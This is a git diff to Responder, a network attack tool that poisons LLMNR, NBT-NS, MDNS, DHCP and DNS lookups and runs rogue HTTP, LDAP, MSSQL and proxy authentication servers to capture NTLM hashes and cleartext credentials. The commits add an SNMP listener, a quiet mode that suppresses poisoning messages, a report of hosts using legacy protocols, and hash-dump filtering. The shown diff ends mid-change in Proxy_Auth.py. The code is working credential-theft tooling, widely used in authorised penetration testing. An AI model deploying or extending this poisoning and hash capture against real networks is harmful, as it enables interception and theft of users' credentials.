Revert "run smbv1 scan in runfinger"

Merge pull request #218 from ss23/snmp
Implement a basic SNMP listener
2025-12-30 19:39:08 +00:00 · 2022-11-08 09:22:41 -03:00 · 2022-11-07 11:18:02 -03:00 · 2022-11-06 01:27:28 +13:00 · 2022-11-03 15:44:05 -03:00 · 2022-11-02 19:16:10 +01:00
26 changed files with 191 additions and 95 deletions
--- a/.github/FUNDING.yml
+++ b/.github/FUNDING.yml
@@ -0,0 +1,3 @@
+github: lgandx
+patreon: PythonResponder
+custom: 'https://paypal.me/PythonResponder'
--- a/DumpHash.py
+++ b/DumpHash.py
@@ -28,14 +28,20 @@ def GetResponderCompleteNTLMv2Hash(cursor):
     res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
     Output = ""
     for row in res.fetchall():
-         Output += '{0}'.format(row[0])+'\n'
+         if "$" in row[0]:
+             pass
+         else:
+            Output += '{0}'.format(row[0])+'\n'
     return Output

 def GetResponderCompleteNTLMv1Hash(cursor):
     res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
     Output = ""
     for row in res.fetchall():
-         Output += '{0}'.format(row[0])+'\n'
+         if "$" in row[0]:
+             pass
+         else:
+            Output += '{0}'.format(row[0])+'\n'
     return Output

 cursor = DbConnect()
--- a/README.md
+++ b/README.md
@@ -20,11 +20,11 @@ Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Succes

 - Built-in MSSQL Auth server.

-In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005, 2008, 2012, 2019.
+This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005, 2008, 2012, 2019.

 - Built-in HTTP Auth server.

-In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server was successfully tested on IE 6 to IE 11, Edge, Firefox, Chrome, Safari.
+This server supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server was successfully tested on IE 6 to IE 11, Edge, Firefox, Chrome, Safari.

 Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can now send your custom files to a victim.

@@ -34,11 +34,11 @@ Same as above. The folder certs/ contains 2 default keys, including a dummy pri

 - Built-in LDAP Auth server.

-In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for LDAP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.
+This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.

 - Built-in DCE-RPC Auth server.

-In order to redirect DCE-RPC Authentication to this tool, you will need to set the option -r and -d (NBT-NS queries for DCE-RPC server lookup are sent using the Workstation and Domain Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes. This server was successfully tested on Windows XP to Server 2019.
+This server supports NTLMSSP hashes. This server was successfully tested on Windows XP to Server 2019.

 - Built-in FTP, POP3, IMAP, SMTP Auth servers.

@@ -56,10 +56,6 @@ This module will capture all HTTP requests from anyone launching Internet Explor

 This module allows to find the PDC in stealth mode.

- Fingerprinting
-
-When the option -f is used, Responder will fingerprint every host who issued an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode. 
-
 - Icmp Redirect

    python tools/Icmp-Redirect.py
@@ -161,8 +157,7 @@ Options:
                        False
    -P, --ProxyAuth       Force NTLM (transparently)/Basic (prompt)
                        authentication for the proxy. WPAD doesn't need to be
-                        ON. This option is highly effective when combined with
-                        -r. Default: False
+                        ON. Default: False
    --lm                  Force LM hashing downgrade for Windows XP/2003 and
                        earlier. Default: False
    --disable-ess         Force ESS downgrade. Default: False
@@ -177,9 +172,14 @@ You can contribute to this project by donating to the following $XLM (Stellar Lu

 "GCGBMO772FRLU6V4NDUKIEXEFNVSP774H2TVYQ3WWHK4TEKYUUTLUKUH"

-Or BTC address:
+Paypal:
+
+https://paypal.me/PythonResponder
+
+Patreon:
+
+https://www.patreon.com/PythonResponder

-"1HkFmFs5fmbCoJ7ZM5HHbGgjyqemfU9o7Q"

 ## Acknowledgments ##

--- a/Report.py
+++ b/Report.py
@@ -61,6 +61,14 @@ def GetResponderCompleteHash(cursor):
     for row in res.fetchall():
         print('{0}'.format(row[0]))

+def GetUniqueLookupsIP(cursor):
+     res = cursor.execute("SELECT Poisoner, SentToIp FROM Poisoned WHERE Poisoner in (SELECT DISTINCT UPPER(Poisoner) FROM Poisoned)")
+     for row in res.fetchall():
+         if 'fe80::' in row[1]:
+             pass
+         else: 
+             print('Protocol: {0}, IP: {1}'.format(row[0], row[1]))
+
 def GetUniqueLookups(cursor):
     res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner")
     for row in res.fetchall():
@@ -99,6 +107,8 @@ print(color("[+] Generating report...\n", code = 3, modifier = 1))

 print(color("[+] DHCP Query Poisoned:", code = 2, modifier = 1))
 GetUniqueDHCP(cursor)
+print(color("\n[+] Unique IP using legacy protocols:", code = 2, modifier = 1))
+GetUniqueLookupsIP(cursor)
 print(color("\n[+] Unique lookups ordered by IP:", code = 2, modifier = 1))
 GetUniqueLookups(cursor)
 GetStatisticUniqueLookups(cursor)
@@ -107,7 +117,7 @@ GetResponderUsernames(cursor)
 print(color("\n[+] Username details:", code = 2, modifier = 1))
 GetResponderUsernamesWithDetails(cursor)
 GetResponderUsernamesStatistic(cursor)
-print color("\n[+] RunFinger Scanned Hosts:", code = 2, modifier = 1)
+print (color("\n[+] RunFinger Scanned Hosts:", code = 2, modifier = 1))
 cursor.close()
 try:
 	cursor = FingerDbConnect()
--- a/Responder.conf
+++ b/Responder.conf
@@ -15,6 +15,7 @@ DNS = On
 LDAP = On
 DCERPC = On
 WINRM = On
+SNMP = Off

 ; Custom challenge. 
 ; Use "Random" for generating a random challenge for each requests (Default)
--- a/Responder.py
+++ b/Responder.py
@@ -39,7 +39,8 @@ parser.add_option('-w','--wpad',           action="store_true", help="Start the
 parser.add_option('-u','--upstream-proxy', action="store",      help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
 parser.add_option('-F','--ForceWpadAuth',  action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False)

-parser.add_option('-P','--ProxyAuth',       action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)
+parser.add_option('-P','--ProxyAuth',       action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective. Default: False", dest="ProxyAuth_On_Off", default=False)
+parser.add_option('-Q','--quiet',           action="store_true", help="Tell Responder to be quiet, disables a bunch of printing from the poisoners. Default: False", dest="Quiet", default=False)

 parser.add_option('--lm',                  action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
 parser.add_option('--disable-ess',         action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
@@ -250,18 +251,20 @@ def serve_thread_SSL(host, port, handler):

 		cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
 		key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
-
+		context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+		context.load_cert_chain(cert, key)
 		if OsInterfaceIsSupported():
 			server = ThreadingTCPServer(('', port), handler)
-			server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
+			server.socket = context.wrap_socket(server.socket, server_side=True)
 			server.serve_forever()
 		else:
 			server = ThreadingTCPServer(('', port), handler)
-			server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
+			server.socket = context.wrap_socket(server.socket, server_side=True)
 			server.serve_forever()
 	except:
 		print(color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running.")

+
 def main():
 	try:
 		if (sys.version_info < (3, 0)):
@@ -362,12 +365,19 @@ def main():
 			threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,)))
 			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 53, DNSTCP,)))

+		if settings.Config.SNMP_On_Off:
+			from servers.SNMP import SNMP
+			threads.append(Thread(target=serve_thread_udp, args=('', 161, SNMP,)))
+
 		for thread in threads:
-			thread.setDaemon(True)
+			thread.daemon = True
 			thread.start()

 		if settings.Config.AnalyzeMode:
 			print(color('[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1))
+		if settings.Config.Quiet_Mode:
+			print(color('[+] Responder is in quiet mode. No NBT-NS, LLMNR, MDNS messages will print to screen.', 3, 1))
+			

 		if settings.Config.DHCP_On_Off:
 			from poisoners.DHCP import DHCP
--- a/poisoners/DHCP.py
+++ b/poisoners/DHCP.py
@@ -256,8 +256,8 @@ def ParseDHCPCode(data, ClientIP,DHCP_DNS):
    RequestIP   = data[245:249]
    
    if DHCPClient.count(MacAddrStr) >= 4:
-    	return "'%s' has been poisoned more than 4 times. Ignoring..." % MacAddrStr
-    	
+        return "'%s' has been poisoned more than 4 times. Ignoring..." % MacAddrStr
+
    if OpCode == b"\x02" and Respond_To_Requests:  # DHCP Offer
        ROUTERIP = ClientIP
        return 'Found DHCP server IP: %s, now waiting for incoming requests...' % (ROUTERIP)
@@ -346,5 +346,5 @@ def DHCP(DHCP_DNS):
                if SrcPort == 67 or DstPort == 67:
                    ClientIP = socket.inet_ntoa(data[0][26:30])
                    ret = ParseDHCPCode(data[0][42:], ClientIP,DHCP_DNS)
-                    if ret:
+                    if ret and not settings.Config.Quiet_Mode:
                        print(text("[*] [DHCP] %s" % ret))
--- a/poisoners/LLMNR.py
+++ b/poisoners/LLMNR.py
@@ -37,7 +37,7 @@ def IsICMPRedirectPlausible(IP):
 		for line in file:
 			ip = line.split()
 			if len(ip) < 2:
-		   		continue
+				continue
 			elif ip[0] == 'nameserver':
 				dnsip.extend(ip[1:])
 		for x in dnsip:
@@ -58,13 +58,13 @@ class LLMNR(BaseRequestHandler):  # LLMNR Server class
 			LLMNRType = Parse_IPV6_Addr(data)

 			# Break out if we don't want to respond to this host
-			if RespondToThisHost(self.client_address[0], Name) is not True:
+			if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True:
 				return None
 			#IPv4
 			if data[2:4] == b'\x00\x00' and LLMNRType:
 				if settings.Config.AnalyzeMode:
 					LineHeader = "[Analyze mode: LLMNR]"
-					print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1))
+					print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
 					SavePoisonersToDb({
 							'Poisoner': 'LLMNR', 
 							'SentToIp': self.client_address[0], 
@@ -76,21 +76,23 @@ class LLMNR(BaseRequestHandler):  # LLMNR Server class
 					Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
 					Buffer1.calculate()
 					soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
-					LineHeader = "[*] [LLMNR]"
-					print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1))
+					if not settings.Config.Quiet_Mode:
+						LineHeader = "[*] [LLMNR]"
+						print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
 					SavePoisonersToDb({
 							'Poisoner': 'LLMNR', 
 							'SentToIp': self.client_address[0], 
 							'ForName': Name,
 							'AnalyzeMode': '0',
 							})
-	
+
 				elif LLMNRType == 'IPv6':
 					Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
 					Buffer1.calculate()
 					soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
-					LineHeader = "[*] [LLMNR]"
-					print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1))
+					if not settings.Config.Quiet_Mode:
+						LineHeader = "[*] [LLMNR]"
+						print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
 					SavePoisonersToDb({
 							'Poisoner': 'LLMNR6', 
 							'SentToIp': self.client_address[0], 
@@ -99,4 +101,4 @@ class LLMNR(BaseRequestHandler):  # LLMNR Server class
 							})

 		except:
-			raise
+			pass
--- a/poisoners/MDNS.py
+++ b/poisoners/MDNS.py
@@ -32,14 +32,14 @@ def Parse_MDNS_Name(data):
 			NameLen_ = data[1+NameLen]
 			Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
 			FinalName = Name+b'.'+Name_
-			return FinalName.decode("latin-1")
+			return FinalName.decode("latin-1").replace("\x05","")
 		else:
 			data = NetworkRecvBufferPython2or3(data[12:])
 			NameLen = struct.unpack('>B',data[0])[0]
 			Name = data[1:1+NameLen]
 			NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
 			Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
-			return Name+'.'+Name_
+			return Name+'.'+Name_.replace("\x05","")

 	except IndexError:
 		return None
@@ -57,11 +57,11 @@ class MDNS(BaseRequestHandler):
 		MDNSType = Parse_IPV6_Addr(data)
 		# Break out if we don't want to respond to this host
 		
-		if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True):
+		if (not Request_Name) or (RespondToThisHost(self.client_address[0].replace("::ffff:",""), Request_Name) is not True):
 			return None

 		if settings.Config.AnalyzeMode:  # Analyze Mode
-			print(text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3))))
+			print(text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Request_Name, 3))))
 			SavePoisonersToDb({
 						'Poisoner': 'MDNS', 
 						'SentToIp': self.client_address[0], 
@@ -73,7 +73,8 @@ class MDNS(BaseRequestHandler):
 			Buffer = MDNS_Ans(AnswerName = Poisoned_Name)
 			Buffer.calculate()
 			soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
-			print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1))
+			if not settings.Config.Quiet_Mode:
+				print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1))
 			SavePoisonersToDb({
 						'Poisoner': 'MDNS', 
 						'SentToIp': self.client_address[0], 
@@ -86,7 +87,8 @@ class MDNS(BaseRequestHandler):
 			Buffer = MDNS6_Ans(AnswerName = Poisoned_Name)
 			Buffer.calculate()
 			soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
-			print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1))
+			if not settings.Config.Quiet_Mode:
+				print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1))
 			SavePoisonersToDb({
 						'Poisoner': 'MDNS6', 
 						'SentToIp': self.client_address[0], 
--- a/poisoners/NBTNS.py
+++ b/poisoners/NBTNS.py
@@ -31,13 +31,12 @@ class NBTNS(BaseRequestHandler):
 		data, socket = self.request
 		Name = Decode_Name(NetworkRecvBufferPython2or3(data[13:45]))
 		# Break out if we don't want to respond to this host
-		if RespondToThisHost(self.client_address[0], Name) is not True:
+		if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True:
 			return None

 		if data[2:4] == b'\x01\x10':
 			if settings.Config.AnalyzeMode:  # Analyze Mode
-				LineHeader = "[Analyze mode: NBT-NS]"
-				print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1))
+				print(text('[Analyze mode: NBT-NS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Name, 3))))
 				SavePoisonersToDb({
 							'Poisoner': 'NBT-NS', 
 							'SentToIp': self.client_address[0], 
@@ -48,8 +47,9 @@ class NBTNS(BaseRequestHandler):
 				Buffer1 = NBT_Ans()
 				Buffer1.calculate(data)
 				socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
-				LineHeader = "[*] [NBT-NS]"
-				print(color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46]))), 2, 1))
+				if not settings.Config.Quiet_Mode:
+					LineHeader = "[*] [NBT-NS]"
+					print(color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46]))), 2, 1))
 				SavePoisonersToDb({
 							'Poisoner': 'NBT-NS', 
 							'SentToIp': self.client_address[0], 
--- a/requirements.txt
+++ b/requirements.txt
@@ -0,0 +1 @@
+netifaces==0.10.4
--- a/servers/Browser.py
+++ b/servers/Browser.py
@@ -165,7 +165,7 @@ def BecomeBackup(data,Client):
 			Role       = NBT_NS_Role(data[45:48])

 			if settings.Config.AnalyzeMode:
-				print(text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain)))
+				print(text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client.replace("::ffff:",""), Name,Role,Domain)))
 				RAPInfo = RAPThisDomain(Client, Domain)
 				if RAPInfo is not None:
 					print(RAPInfo)
@@ -182,7 +182,7 @@ def ParseDatagramNBTNames(data,Client):

 	
 		if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
-			print(text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2)))
+			print(text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client.replace("::ffff:",""), Name, Role1, Domain, Role2)))
 			RAPInfo = RAPThisDomain(Client, Domain)
 			if RAPInfo is not None:
 				print(RAPInfo)
--- a/servers/DNS.py
+++ b/servers/DNS.py
@@ -49,35 +49,35 @@ class DNS(BaseRequestHandler):
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print(color("[*] [DNS] A Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+				print(color("[*] [DNS] A Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))

 			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv4":
 				buff = DNS_AnsOPT()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print(color("[*] [DNS] A OPT Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+				print(color("[*] [DNS] A OPT Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
 				
 			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV":
 				buff = DNS_SRV_Ans()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print(color("[*] [DNS] SRV Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+				print(color("[*] [DNS] SRV Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))

 			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6":
 				buff = DNS6_Ans()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print(color("[*] [DNS] AAAA Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+				print(color("[*] [DNS] AAAA Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))

 			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6":
 				buff = DNS6_Ans()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print(color("[*] [DNS] AAAA OPT Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+				print(color("[*] [DNS] AAAA OPT Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))


 		except Exception:
@@ -97,35 +97,35 @@ class DNSTCP(BaseRequestHandler):
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				self.request.send(NetworkSendBufferPython2or3(buff))
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print(color("[*] [DNS] A Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+				print(color("[*] [DNS] A Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))

 			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv4":
 				buff = DNS_AnsOPT()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				self.request.send(NetworkSendBufferPython2or3(buff))
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print(color("[*] [DNS] A OPT Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+				print(color("[*] [DNS] A OPT Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
 				
 			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV":
 				buff = DNS_SRV_Ans()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				self.request.send(NetworkSendBufferPython2or3(buff))
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print(color("[*] [DNS] SRV Record poisoned answer sent: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+				print(color("[*] [DNS] SRV Record poisoned answer sent: %-15s  Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))

 			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6":
 				buff = DNS6_Ans()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				self.request.send(NetworkSendBufferPython2or3(buff))
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print(color("[*] [DNS] AAAA Record poisoned answer sent: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+				print(color("[*] [DNS] AAAA Record poisoned answer sent: %-15s  Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))

 			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6":
 				buff = DNS6_AnsOPT()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				self.request.send(NetworkSendBufferPython2or3(buff))
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print(color("[*] [DNS] AAAA OPT Record poisoned answer sent: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+				print(color("[*] [DNS] AAAA OPT Record poisoned answer sent: %-15s  Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))

 		except Exception:
 			pass
--- a/servers/HTTP.py
+++ b/servers/HTTP.py
@@ -205,7 +205,7 @@ def PacketSequence(data, client, Challenge):
 			ParseHTTPHash(NTLM_Auth, Challenge, client, module)

 			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
-				print(text("[HTTP] WPAD (auth) file sent to %s" % client))
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))

 				return WPAD_Custom
 			else:
@@ -230,7 +230,7 @@ def PacketSequence(data, client, Challenge):

 		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
 			if settings.Config.Verbose:
-				print(text("[HTTP] WPAD (auth) file sent to %s" % client))
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))

 			return WPAD_Custom
 		else:
@@ -241,12 +241,12 @@ def PacketSequence(data, client, Challenge):
 		if settings.Config.Basic:
 			Response = IIS_Basic_401_Ans()
 			if settings.Config.Verbose:
-				print(text("[HTTP] Sending BASIC authentication request to %s" % client))
+				print(text("[HTTP] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))

 		else:
 			Response = IIS_Auth_401_Ans()
 			if settings.Config.Verbose:
-				print(text("[HTTP] Sending NTLM authentication request to %s" % client))
+				print(text("[HTTP] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))

 		return Response

@@ -290,7 +290,7 @@ class HTTP(BaseRequestHandler):
 					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					self.request.close()
 					if settings.Config.Verbose:
-						print(text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0]))
+						print(text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0].replace("::ffff:","")))

 				else:
 					Buffer = PacketSequence(data,self.client_address[0], Challenge)
--- a/servers/HTTP_Proxy.py
+++ b/servers/HTTP_Proxy.py
@@ -209,7 +209,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 	def handle(self):
 		(ip, port) =  self.client_address[0], self.client_address[1]
 		if settings.Config.Verbose:
-			print(text("[PROXY] Received connection from %s" % self.client_address[0]))
+			print(text("[PROXY] Received connection from %s" % self.client_address[0].replace("::ffff:","")))
 		self.__base_handle()

 	def _connect_to(self, netloc, soc):
@@ -286,7 +286,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 				Cookie = self.headers['Cookie'] if "Cookie" in self.headers else ''

 				if settings.Config.Verbose:
-					print(text("[PROXY] Client        : %s" % color(self.client_address[0], 3)))
+					print(text("[PROXY] Client        : %s" % color(self.client_address[0].replace("::ffff:",""), 3)))
 					print(text("[PROXY] Requested URL : %s" % color(self.path, 3)))
 					print(text("[PROXY] Cookie        : %s" % Cookie))

--- a/servers/LDAP.py
+++ b/servers/LDAP.py
@@ -173,7 +173,7 @@ def ParseCLDAPPacket(data, client, Challenge):
 		
 		elif Operation == b'\x63':
 			Buffer = ParseSearch(data)
-			print(text('[CLDAP] Sent CLDAP pong to %s.'% client))
+			print(text('[CLDAP] Sent CLDAP pong to %s.'% client.replace("::ffff:","")))
 			return Buffer

 		elif settings.Config.Verbose:
--- a/servers/MSSQL.py
+++ b/servers/MSSQL.py
@@ -134,7 +134,7 @@ class MSSQL(BaseRequestHandler):
 				if not data:
 					break
 				if settings.Config.Verbose:
-					print(text("[MSSQL] Received connection from %s" % self.client_address[0]))
+					print(text("[MSSQL] Received connection from %s" % self.client_address[0].replace("::ffff:","")))
 				if data[0] == b"\x12" or data[0] == 18:  # Pre-Login Message
 					Buffer = str(MSSQLPreLoginAnswer())
 					self.request.send(NetworkSendBufferPython2or3(Buffer))
--- a/servers/Proxy_Auth.py
+++ b/servers/Proxy_Auth.py
@@ -57,7 +57,7 @@ def PacketSequence(data, client, Challenge):
 		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
 		if Packet_NTLM == b'\x01':
 			if settings.Config.Verbose:
-				print(text("[Proxy-Auth] Sending NTLM authentication request to %s" % client))
+				print(text("[Proxy-Auth] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
 			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 			Buffer.calculate()
 			Buffer_Ans =  WPAD_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
@@ -69,9 +69,10 @@ def PacketSequence(data, client, Challenge):
 			GrabUserAgent(data)
 			GrabCookie(data)
 			GrabHost(data)
-			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) #While at it, grab some SMB hashes...
-			Buffer.calculate()
-			return Buffer
